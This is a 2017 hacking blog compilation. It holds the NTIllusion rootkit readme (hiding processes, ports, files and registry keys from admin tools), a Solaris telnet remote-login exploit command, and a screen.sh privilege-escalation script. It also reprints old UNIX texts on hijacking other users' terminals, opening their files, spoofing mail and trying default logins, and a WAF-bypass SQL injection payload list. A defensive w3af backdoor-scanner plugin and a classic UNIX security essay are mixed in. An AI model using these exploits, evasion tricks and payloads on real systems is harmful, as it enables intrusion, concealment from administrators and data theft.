Tuesday, May 30, 2017
DO YOU KNOW WHAT A ROOTKIT IS??? CHECK THIS ONE:
I/ Features (*) :
-------------
---------------------------------------------------------------------------
o TCP - coder - - hooked api(s) -
---------------------------------------------------------------------------
- defeats netstat (windows) CharToOembufA
- defeats aports (ntutility.com) AllocAndGetTCPExTableFromStack
- defeats fport (foundstone) AllocAndGetTCPExTableFromStack
** - disables tcpview (sysinternals) AllocAndGetTCPExTableFromStack
& whole program disabled
- defeats any program that rely directly (or by using GetProcAddress) on
AllocAndGetTCPExTableFromStack
---------------------------------------------------------------------------
o FILES
---------------------------------------------------------------------------
- defeats explorer (windows) FindFirst/NextFileA/W
- defeats cmd's dir (windows) WriteConsoleW(/A)
- defeats any program that rely directly (or by using GetProcAddress) on
FindFirst/NextFileA/W
---------------------------------------------------------------------------
o PROCESSES
---------------------------------------------------------------------------
- defeats taskmanager (windows) NtQuerySystemInformation
- disables Process Explorer (sysinternals) NtQuerySystemInformation
- defeats any program that rely directly (or by using GetProcAddress) on
NtQuerySystemInformation
---------------------------------------------------------------------------
o REGISTRY
---------------------------------------------------------------------------
- defeats regedit (windows) RegEnumValue
- defeats any program that rely directly (or by using GetProcAddress) on
RegEnumValue
---------------------------------------------------------------------------
Notes :
-------
* Any process whose executable name or command line contains RTK_FILE_CHAR
will not be hijacked (backdoor)
II/ Details :
-------------
<------------->
C:\>kNTIllusionLoader.exe kNTIllusion.dll
Running NTIllusion Rootkit Loader v 0.1 by Kdm (kodmaker@netcourrier.com)
OK
C:\>
Debug View :
- Rootkit injected into 'c:\windows\explorer.exe', fixing modules...
...
- # Hooked CreateProcessW : - "C:\aports.exe" , injecting rootkit
(c:\kntillusion.dll)...
- Rootkit injected into 'c:\aports.exe', fixing modules...
- Spreading across userland : injected into 'c:\aports.exe', fixing modules...
- 'c:\aports.exe' : all modules reviewed.
---------------------------------------------------------------------------
o TCP
---------------------------------------------------------------------------
NTIllusion hooks AllocAndGetTCPExTableFromStack to make programs hide some
(strategic ? :]) tcp ports. These "hidden ports" belong to range from
RTK_PORT_HIDE_MIN to RTK_PORT_HIDE_MAX. This is done by hijacking
AllocAndGetTCPExTableFromStack for all programs (NT latests versions) and
CharToOembufA (netstat output).
= Demo =
C:\>nc -lp 56788
C:\>netstat -an
Debug View : [!] NTIllusion made a port hidden (5678* range)
C:\>aports.exe
Debug View : [!] NTIllusion made a TCP socket hidden for process nc.exe (1884)
---------------------------------------------------------------------------
---------------------------------------------------------------------------
o PROCESS
---------------------------------------------------------------------------
NTIllusion hooks NtQuerySystemInformation to make programs hide some
(strategic ? :]) process. So all process whose file name starts by
RTK_PROCESS_CHAR will be hidden.
= Demo =
C:\>_ntibackdoor.exe
Debug View : [!] NTIllusion made the process '_ntibackdoor.exe' hidden.
Note : the SendMessageW hook for taskmgr.exe is available for test purpose.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
o FILES
---------------------------------------------------------------------------
NTIllusion hooks FindFirstFileA/W, FindNextFileA/W to make programs hide
some (strategic ? :]) files. Contrary to the registry hook engine, a hidden
file with a prefix that sits in a lower position than an other file's one
in ASCII table won't prevent them from being shown. So a hidden file named
abcd.exe won't hide bcde.exe and so on. All files whose name start by
RTK_FILE_CHAR will be hidden.
= Demo =
echo rootkitloaded > c:\_ntimsg.txt
C:\>dir c:\*.*
Debug View : [!] NTIllusion made the file : '_ntimsg.txt' invisible.
Browse to c:\ :
Debug View : [!] NTIllusion made the file : '_ntimsg.txt' invisible.
---------------------------------------------------------------------------
---------------------------------------------------------------------------
o REGISTRY
---------------------------------------------------------------------------
NTIllusion hooks regedit to make it hide some (strategic ? :]) registry keys.
Regedit won't see all keys starting by string RTK_REG_CHAR (_nti by default).
Indeed, we return a value that means the end of the keys list. That's why you
must be prudent when choosing RTK_REG_CHAR because a too global prefix will
also hide normal keys and may bring the user suspicion.
= Examples =
- Bad prefix : using _ char as rootkit's tag could hide other keys whose
first char's ascii code is greater than _ one, since keys are retrieved in
lexicographic order by default.
- Correct prefix : using char © prevent us the effort of returning the next
correct key (if it exists) since registry key names are most of the time
composed of alphanumeric tokens.
= Demo =
C:\>regedit.exe
Debug View : [!] NTIllusion made the key '_ntiKdm' (and all subsequent keys)
hidden.
---------------------------------------------------------------------------
III/ Comments :
---------------
- fixed debug output function : rootkit now sends a whole string instead of
unformatted parts
- you can solve self tcp scan (instead of netsat) problem by using a
reverse connection backdoor
- beware : dll may be revealed by Sygate personal firewall that contains
a dll injection couterfighting mechanism. So name this dll properly !
(ie not backdoor.dll ... but system.dll)
IV/ Todo :
----------
- port NT ILLUSION to win 9x (yes, it's possible)
- hijack LoadLibraryW & CreateProcessA
- code a routine that scans all process from explorer's process and try to
inject them (this will inject console programs launched before the rootkit
is loaded or graphic process not brought to foreground but able to reveal
us: for example, ftp servers)) by using no privilege, then the
SeDebugPrivilege (if possible)
*****************************************************************************/
https://github.com/bowlofstew/rootkit.com/tree/master/kdm/NTIllusion
Free software serial port monitor, Com Rs232 sniffer with communication packet data analyzer. This monitoring utility can spy, capture, view, analyze, test com ports activity performing com port connection and traffic analysis with data acquisition and control. You can use this system as device interface testing tool, modem data transfer viewer and so on. Serial Monitor can be successfully used for monitoring data flow between serial devices and Windows application, debugging com port connections, developing, reverse-engineering and implementing serial protocol, serial device driver development, serial hardware development, research the functionality of any third-party software and hardware, testing software and hardware. Free Serial Port Monitor can be successfully used by programmers, beta-testers, software developers, hardware engineers, IT support specialists, industrial control personnel, SCADA software engineers, science technicians, systems integrators, consultants, lab experts, University students.
Free Serial Port Monitor 3.31 - Free Serial Port Monitor, RS232 Com Software Sniffer and Communication Analyzer
http://www.softrecipe.com/Software-Development/Others/free_serial_port_monitor.html
http://www.softrecipe.com/Software-Development/Others/free_serial_port_monitor.html
Monday, May 29, 2017
Trivial remote Solaris 0day, disable telnet now.
Oh jeez, that’s not good. This was posted to Full-Disclosure. Remote root exploit in the Solaris 10/11 telnet daemon. It doesn’t require any skill, any exploit knowledge, and can be scripted for mass attacks. Basically if you pass a “-fusername” as an argument to the –l option you get full access to the OS as the user specified. In my example I do it as bin but it worked for regular users, just not for root. This combined with a reliable local privilege escalation exploit would be devastating. Expect mass scanning and possibly the widespread exploitation of this vulnerability.
And example of the command line is
telnet -l "-fbin" target_address
Please disable telnet on Solaris at this time. The HEV for this will be shipping to ErrataSec customers within the hour.
UPDATE: There seems to be some conflicting reports about this vulnerability working with the root account. This does not work on a default install of Solaris 10. By default a variable is set in /etc/default/login called CONSOLE. If this variable is set then root is not allowed to login from anywhere but the console. Commenting this variable out allows root to login from anywhere and allows this vulnerability to take advantage of the telnet exploit. Below is a pic of my trying it with console set then with console commented out.
http://blog.erratasec.com/2007/02/trivial-remote-solaris-0day-disable.html#.WSxAPOvyuds
And example of the command line is
telnet -l "-fbin" target_address
Please disable telnet on Solaris at this time. The HEV for this will be shipping to ErrataSec customers within the hour.
UPDATE: There seems to be some conflicting reports about this vulnerability working with the root account. This does not work on a default install of Solaris 10. By default a variable is set in /etc/default/login called CONSOLE. If this variable is set then root is not allowed to login from anywhere but the console. Commenting this variable out allows root to login from anywhere and allows this vulnerability to take advantage of the telnet exploit. Below is a pic of my trying it with console set then with console commented out.
DoD
**DO NOT DISTRIBUTE**
#
SCREEN=/usr/bin/screen
umask 0
if [ ! -x $SCREEN ]; then
echo "I can't execute $SCREEN..."
exit 0
fi
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa
if [ -f "$LINK" ]; then
echo "DAMN. I don't have usable pts socket available..."
exit 0
fi
echo -ne "Finding root owned tty...\t\t"
unset TTY
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
TTY="$x"
break
fi
done
echo -n "$TTY"
if [ "$TTY" = "" ]; then
echo -e "\nI can't find a root owned tty!"
exit 0
fi
if [ ! -w $HOME -o ! -w /tmp ]; then
echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
exit 0
fi
cat >$HOME/.screenrc <<_eof_ -aa="" -c="" -d="" -m="" -ne="" -q="" -s="" 00="" 100="" _eof_="" amp="" autodetach="" defscrollback="" defsocketpath="" echo="" hs:ts="\E_:fs=\E\\:ds=\E_\E\\" nstarting="" on="" screen...="" screenrc="" t="" termcapinfo="" vbell="">/dev/null &
SCPID=`echo $!`
echo -n "PID: $SCPID"
while :; do
sleep 1
if [ "$#" -ge "0" ]; then
break
fi
done
cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"
CNT=5 # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
let CNT=$CNT-1
sleep 1
done
echo -n "Done."
echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null
echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null
echo -ne "\rComplete.\n"
exit 1
[END_CUT] screen.sh
RSAREF is a cryptographic toolkit designed to facilitate rapid deployment of Internet Privacy-Enhanced Mail (PEM) implementations. RSAREF represents the fruits of RSA Data Security's commitment to the U.S. Department of Defense's Advanced Research Projects Agency (DARPA) to provide free cryptographic source code in support of a PEM standard. RSA Laboratories offers RSAREF in expectation of PEM's forthcoming publication as an Internet standard.
findBackdoor.py
class findBackdoor(baseDiscoveryPlugin): 00124 ''' 00125 Find web backdoors and web shells. 00126 @author: Andres Riancho ( andres.riancho@gmail.com ) 00127 ''' 00128 00129 def __init__(self): 00130 baseDiscoveryPlugin.__init__(self) 00131 00132 # Internal variables 00133 self._analyzed_dirs = disk_list() 00134 self._fuzzable_requests_to_return = [] 00135 00136 def discover(self, fuzzableRequest): 00137 ''' 00138 For every directory, fetch a list of shell files and analyze the response. 00139 00140 @parameter fuzzableRequest: A fuzzableRequest instance that contains 00141 (among other things) the URL to test. 00142 ''' 00143 domain_path = fuzzableRequest.getURL().getDomainPath() 00144 self._fuzzable_requests_to_return = [] 00145 00146 if domain_path not in self._analyzed_dirs: 00147 self._analyzed_dirs.append(domain_path) 00148 00149 # Search for the web shells 00150 for web_shell_filename in WEB_SHELLS: 00151 web_shell_url = domain_path.urlJoin(web_shell_filename) 00152 # Perform the check in different threads 00153 targs = (web_shell_url,) 00154 self._tm.startFunction(target=self._check_if_exists, 00155 args=targs, ownerObj=self) 00156 00157 # Wait for all threads to finish 00158 self._tm.join(self) 00159 00160 return self._fuzzable_requests_to_return 00161 00162 00163 def _check_if_exists(self, web_shell_url): 00164 ''' 00165 Check if the file exists. 00166 00167 @parameter web_shell_url: The URL to check 00168 ''' 00169 try: 00170 response = self._urlOpener.GET(web_shell_url, useCache=True) 00171 except w3afException: 00172 om.out.debug('Failed to GET webshell:' + web_shell_url) 00173 else: 00174 if self._is_possible_backdoor(response): 00175 v = vuln.vuln() 00176 v.setPluginName(self.getName()) 00177 v.setId(response.id) 00178 v.setName('Possible web backdoor') 00179 v.setSeverity(severity.HIGH) 00180 v.setURL(response.getURL()) 00181 msg = 'A web backdoor was found at: "%s"; this could ' \ 00182 'indicate that the server was hacked.' % v.getURL() 00183 v.setDesc(msg) 00184 kb.kb.append(self, 'backdoors', v) 00185 om.out.vulnerability(v.getDesc(), severity=v.getSeverity()) 00186 00187 fuzzable_requests = self._createFuzzableRequests(response) 00188 self._fuzzable_requests_to_return += fuzzable_requests 00189 00190 def _is_possible_backdoor(self, response): 00191 ''' 00192 Heuristic to infer if the content ofhas the pattern of a 00193 backdoor response. 00194 00195 @param response: httpResponse object 00196 @return: A bool value 00197 ''' 00198 if not is_404(response): 00199 body_text = response.getBody() 00200 dom = response.getDOM() 00201 if dom: 00202 for ele, attrs in BACKDOOR_COLLECTION.iteritems(): 00203 for attrname, attr_vals in attrs.iteritems(): 00204 # Set of lowered attribute values 00205 dom_attr_vals = \ 00206 set(n.get(attrname).lower() for n in \ 00207 (dom.xpath('//%s[@%s]' % (ele, attrname)))) 00208 # If at least one elem in intersection return True 00209 if (dom_attr_vals and set(attr_vals)): 00210 return True 00211 00212 # If no regex matched then try with keywords. At least 2 should be 00213 # contained in 'body_text' to succeed. 00214 times = 0 00215 for back_kw in KNOWN_OFFENSIVE_WORDS: 00216 if re.search(back_kw, body_text, re.I): 00217 times += 1 00218 if times == 2: 00219 return True 00220 return False 00221 00222 def getOptions(self): 00223 ''' 00224 @return: A list of option objects for this plugin. 00225 ''' 00226 ol = optionList() 00227 return ol 00228 00229 def setOptions(self, OptionList): 00230 ''' 00231 This method sets all the options that are configured using the user interface 00232 generated by the framework using the result of getOptions(). 00233 00234 @parameter OptionList: A dictionary with the options for the plugin. 00235 @return: No value is returned. 00236 ''' 00237 pass 00238 00239 def getPluginDeps(self): 00240 ''' 00241 @return: A list with the names of the plugins that should be runned before the 00242 current one. 00243 ''' 00244 return [] 00245 00246 def getLongDesc(self): 00247 ''' 00248 @return: A DETAILED description of the plugin functions and features. 00249 ''' 00250 return ''' 00251 This plugin searches for web shells in the directories that are sent as input. 00252 For example, if the input is: 00253 - http://host.tld/w3af/f00b4r.php 00254 00255 The plugin will perform these requests: 00256 - http://host.tld/w3af/c99.php 00257 - http://host.tld/w3af/cmd.php 00258 - http://host.tld/w3af/webshell.php 00259 ... 00260 '''
https://sourcecodebrowser.com/w3af/1.0.0/find_backdoor_8py_source.html
Sunday, May 28, 2017
*** A List Of Some OF The Most Useful UNIX **
*** Hacking Commands, and Some Hints On Their Usage ***
---------------------------------------------------------------
It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:
chown ownername filelist
Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which your are goin to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you cant change nything about it!
---------------------------------------------------------------
Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:
who followed by on or more of the following flags:
-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.
**who -HTu is about the best choice for the average user**
##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###
---------------------------------------------------------------
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
---------------------------------------------------------------
If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:
chmod 777 $HOME
chmod 777 $MAIL
Then clear the screen so they dont see what you just typed.
Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!
---------------------------------------------------------------
Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average user!
type telnet
the following prompt will appear:
telnet>
now type :
open localhost 25
some crap will come up about the mail server..now type:
mail from: xxxxxx Put any name you want.
some more bullshit will come up. Now type:
rcpt to: xxxxxx Put the name of the person to receive mail here.
now type:
data
now you can type the letter...end it with a "."
type quit to exit once you are done.
-------------------------------------------------------------
Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets em every time!
The following script file is an example which will create a
file with the name Ctrl-h. You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****
type the following in vi...
echo'' > 'a^h'
***NOTE...to get the ^h (this really means ctrl-h) from vi type:
Ctrl v
Ctrl h
The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.
*> Title: Tutorial on hacking through a UNIX system
**
In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.
Note: Cosmos is accessed through the Elmos system.
Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).
Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:
Login; (or login;)
password:
When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user.
Common default logins
--------------------------
login; Password:
root root,system,etc..
sys sys,system
daemon daemon
uucp uucp
tty tty
test test
unix unix
bin bin
adm adm
who who
learn learn
uuhost uuhost
nuucp nuucp
If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:
$
%
#
But can be just about anything the sysop or user wants it to be.
Things to do when you are in: Some of the commands that you may want to
try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:
cat /etc/passwd
If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal
The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory
In the Joe login, the last part "/bin/joe " tells us which directory
is his home directory (joe) is. In the "hal" example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.
Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.
On the Security of UNIX
=-=-=-=-=-=-=-=-=-=-=-=
Recently there has been much interest in the security aspects of operating
systems and software.At issue is the ability to prevent undesired disclosure of
information, destruction of information,and harm to the functioning of the
system.This paper discusses the degree of security which can be provided under
the system and offers a number of hints on how to improve security.The first
fact to face is that UNIX was not developed with security,in any realistic
sense,in mind;this fact alone guarantees a vast number of holes.(Actually the
same statement can be made with respect to most systems.)
The area of security in which is theoretically weakest is in protecting against
crashing or at least crippling the operation of the system.The problem here is
not mainly in uncritical acceptance of bad parameters to system calls (there
may be bugs in this area, but none are known)but rather in lack of checks for
excessive consumption of resources.
Most notably, there is no limit on the amount of disk storage used, either in
total space allocated or in the number of files or directories.Here is a
particularly ghastly shell sequence guaranteed to stop the system:
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.In this version of the system,users are prevented from
creating more than a set number of processes simultaneously,so unless users
are in collusion it is unlikely that any one can stop the system altogether.
However, creation of 20 or so CPU or disk-bound jobs leaves few resources
available for others.Also, if many large jobs are run simultaneously,swap space
may run out, causing a panic. It should be evident that excessive consumption
of diskspace, files, swap space and processes can easily occur accidentally in
malfunctioning programs as well as at command level.In fact UNIX is essentially
defenseless against this kind of abuse,nor is there any easy fix.The best that
can be said is that it is generally fairly easy to detect what has happened
when disaster strikes ,to identify the user responsible, and take appropriate
action.In practice,we have found that difficulties in this area are rather
rare,but we have not been faced with malicious users,and enjoy a fairly
generous supply of resources which have served to cushion us against accidental
overconsumption.
The picture is considerably brighter in the area of protection of information
from unauthorized perusal and destruction.Here the degree of security seems
(almost) adequate theoretically, and the problems lie more in the necessity for
care in the actual use of the system.Each UNIX file has associated with it
eleven bits of protection information together with a user identification
number and a user-group identification number (UID and GID).
Nine of the protection bits are used to specify independently permission to
read, to write, and to execute the file to the user himself, to members of the
user's group, and to all other users.Each process generated by or for a user
has associated with it an effective UID and a real UID, and an effective and
real GID.When an attempt is made to access the file for reading, writing, or
executing UID for the process is changed to the UID associated with the file;
the change persists until the process terminates or until the UID changed again
by another execution of a set-UID file.Similarly the effective group ID of a
process is changed to the GID associated with a file when that file is executed
and has the set-GID bit set.The real UID and GID of a process do not change
when any file is executed,but only as the result of a privileged system
call.The basic notion of the set-UID and set-GID bits is that one may write a
program which is executableby others and which maintains files accessible to
others only by that program.
The classical example is the game-playing program which maintains records of
the scores of its players.The program itself has to read and write the score
file,but no one but the game's sponsor can be allowed unrestricted access to
the file lest they manipulate the game to their own advantage.
The solution is to turn on the set-UID bit of the game program. When, and only
when,it is invoked by players of the game,it may update the score file but
ordinary programs executed by others cannot access the score. There are a
number of special cases involved in determining access permissions. Since
executing a directory as a program is a meaningless operation,the
execute-permission bit, for directories, is taken instead to mean permission to
search the directory for a given file during the scanning of a path name; thus
if a directory has execute permission but no read permission for a given user,
he may access files with known names in the directory,but may not read (list)
the entire contents of the directory.
Write permission on a directory is interpreted to mean that the user may create
and delete files in that directory;it is impossible for any user to write
directly into any directory..Another, and from the point of view of security,
much more serious special case is that there is a ``super user'' who is able to
read any file and write any non-directory.The super-user is also able to change
the protection mode and the owner UID and GID of any file and to invoke
privileged system calls.It must be recognized that the mere notion of a
super-user is a theoretical, and usually practical, blemish on any protection
scheme.
The first necessity for a secure system is of course arranging that all files
and directories have the proper protection modes.Traditionally, UNIX software
has been exceedingly permissive in this regard;essentially all commands create
files readable and writable by everyone.In the current version,this policy may
be easily adjusted to suit the needs ofthe installation or the individual user.
Associated with each process and its descendants is a mask, which is in effect
anded with the mode of every file and directory created by that process. In
this way, users can arrange that, by default,all their files are no more
accessible than they wish.The standard mask, set by login,allows all permiss-
ions to the user himself and to his group,but disallows writing by others.
To maintain both data privacy and data integrity,it is necessary, and largely
sufficient,to make one's files inaccessible to others. The lack of sufficiency
could follow from the existence of set-UID programs created by the user and the
possibility of total breach of system security in one of the ways discussed
below(or one of the ways not discussed below).
For greater protection,an encryption scheme is available.Since the editor is
able to create encrypted documents, and the crypt command can be used to pipe
such documents into the other text-processing programs,the length of time
during which clear text versions need be available is strictly limited.The
encryption scheme used is not one of the strongest known, but it is judged
adequate, in the sense that cryptanalysisis likely to require considerably more
effort than more direct methods of reading the encrypted files.For example, a
user who stores data that he regards as truly secret should be aware that he is
implicitly trusting the system administrator not to install a version of the
crypt command that stores every typed password in a file. Needless to say, the
system administrators must be at least as careful as their most demanding user
to place the correct protection mode on the files under their control.
In particular,it is necessary that special files be protected from writing, and
probably reading, by ordinary users when they store sensitive files belonging
to otherusers.It is easy to write programs that examine and change files by
accessing the device on which the files live.
On the issue of password security,UNIX is probably better than most systems.
Passwords are stored in an encrypted form which, in the absence of serious
attention from specialists in the field,appears reasonably secure, provided its
limitations are understood.In the current version, it is based on a slightl y
defective version of the Federal DES;it is purposely defective so that
easily-available hardware is useless for attempts at exhaustive
key-search.Since both the encryption algorithm and the encrypted passwords are
available,exhaustive enumeration of potential passwords is still feasible up to
a point.We have observed that users choose passwords that are easy to
guess:they are short, or from a limited alphabet, or in a dictionary.
Passwords should be at least six characters long and randomly chosen from an
alphabet which includes digits and special characters.
Of course there also exist feasible non-cryptanalytic ways of finding out
passwords.For example: write a program which types out ``login:''on the
typewriter and copies whatever is typed to a file of your own. Then invoke the
command and go away until the victim arrives..The set-UID (set-GID)notion must
be used carefully if any security is to be maintained. The first thing to keep
in mind is that a writable set-UID file can have another program copied onto
it.
For example, if the super-user command is writable,anyone can copy the shell
onto it and get a password-free version of Shell Unix.A more subtle problem can
come from set-UID programs which are not sufficiently careful of what is fed
into them.To take an obsolete example,the previous version of the mail command
was set-UID and owned by the super-user.This version sent mail to the r
ecipient's own directory.The notion was that one should be able to send mail to
anyone even if they want to protecttheir directories from writing. The trouble
was that mailwas rather dumb:anyone could mail someone else's priva te file to
himself.Much more seriousis the following scenario: make a file with a line
like one in the password filewhich allows one to log in as the super-user.Then
make a link named ``.mail'' to the password file in some writable directory on
the same device as the password file (say /tmp). Finally mail the bogus login
line to /tmp/.mail;You can then login as the superuser,clean up the
incriminating evidence,and have your will.
The fact that users can mount their own disks and tapes as file systems can be
another way of gaining super-user status.Once a disk pack is mounted, the
system believes what is on it.Thus one can take a blank disk pack,put on it
anything desired,and mount it.There are obvious and unfortunate consequences.
For example:a mounted disk with garbage on it will crash the system;one of the
files on the mounted disk can easily be a password-free version of Shell Unix;
other files can be unprotected entries for special files. The only easy fix
for this problem is to forbid the use of mount to unpriv- ileged users.A
partial solution, not so restrictive,would be to have the mount command examine
the special file for bad data,set-UID programs owned by others ,and accessible
special files,and balk at unprivileged invokers.
Scott Walters London, CANADA
walterss@julian.uwo.ca
PGP 31 03 1B E1 C7 6E 3A EC 97 32 01 BA 5B 05 5D FB
finger me for public key block
MIME-mail welcome
'Beware the fury of a patient man.'
http://www.iwar.org.uk/hackers/resources/digital%20rebels/articles/unixtips.txt
Waf & Waf Bypassing
Let’s explain firstly what WaF stands for and what it actually does for a website / server.
Waf is short for: Web Application Firewall, its purpose is to filter out a lot of our queries characters.
An example of a normal website we would inject on would look like:
An example of a normal website we would inject on would look like:
www.exmample.com/page.php?id=1 and 1=0 union all select 1,2,3,4,5--
If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.
Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.
Comments used to bypass:
If we do that with a WAF protected website will we get thrown out with a 403 FORBIDDEN error, or the 404 not found error.
Now that you know what a WAF is and what it does, I will show you some tip’s / tricks to bypass it.
Comments used to bypass:
· //· -- · /**/· #· --+· -- -· ;
· -- a
Now for bypassing some WaFs, the exploiting is quite similar to basic SQL injection, yet you have filters now that you have to bypass, here are a few queries that CAN bypass (It’s never 100%).
· page.php?id=1/*!UnIoN*/SeLeCT (In this case we use /! As they are used as inline MySQL comments (sort of php like) and we work with lower case and upper case letters to bypass it as well).
· page.php?id=1+UNIunionON+SeLselectECT+1,2,3,4,5— (In this case we use the double text, its seems rather weird but what it does, if a filter detects the union select, and the filter has preg_replace(php function) to replace our union select with a space (or nothing), it will still show like:
UNION SELECT 1,2,3,4,5--
· page.php?id=1%252f%252a*/UNION%252f%252a /SELECT (In this case we are using HTTP encoding (hence the %252f etc signs, to DOUBLE bypass certain WAF’S (this method works only on 10-15% of the sites I’ve personally tested on))).
Putting it all together:www.exmample.com/page.php?id=1
/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables--
Which will result showing all the table names, just as Chapter 1.
The rest of the exploiting you have to figure out yourself, I gave you the handles for WAF bypassing, a hacker has to do everything on his own to really master / learn something they want, all this does is tickle your brain.
Tips & Trick bypassing more:
1.
id=1+(UnIoN)+(SelECT)+
2.
id=1+(UnIoN+SeLeCT)+
3.
id=1+(UnI)(oN)+(SeL)(EcT)4. id=1+'UnI''On'+'SeL''ECT'5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6.
id=1+UnIoN+SeLecT 1,2,3—
7.
id=1+UnIOn/**/SeLect 1,2,3—
8.
